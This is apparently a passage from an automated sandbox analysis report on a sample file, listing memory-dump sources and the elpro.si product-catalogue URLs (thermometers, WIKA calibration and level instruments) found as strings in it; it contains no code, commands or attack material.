                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/termometri-dataloggerji-ex/termometri/alkoholni-termometri/
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/termometri-dataloggerji-ex/termometri/bimetalni-termometri/
                Source: EwK95WVtzI.exe, 00000000.00000003.1998747633.0000000004980000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/termometri-dataloggerji-ex/termometri/digitalni-termometri/
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/termometri-dataloggerji-ex/termometri/digitalni-termometri/i
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/termometri-dataloggerji-ex/termometri/digitalni-termometri/o
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/termometri-dataloggerji-ex/termometri/digitalni-termometri/p
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/termometri-dataloggerji-ex/termometri/digitalni-termometri/t
                Source: EwK95WVtzI.exe, 00000000.00000003.1998747633.0000000004980000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/wika-partner/
                Source: EwK95WVtzI.exe, 00000000.00000003.1998747633.0000000004980000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/wika-partner/kalibracija/
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/wika-partner/kalibracija/kalibracija-temperature/
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/wika-partner/kalibracija/kalibracija-tlaka/
                Source: EwK95WVtzI.exe, 00000000.00000003.1998747633.0000000004980000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/wika-partner/nivo/
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/wika-partner/nivo/dodatni-izdelki-in-dodatki-za-nivo/
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/wika-partner/nivo/nivojska-stikala-wika/
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/wika-partner/nivo/pretvorniki-nivoja/
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 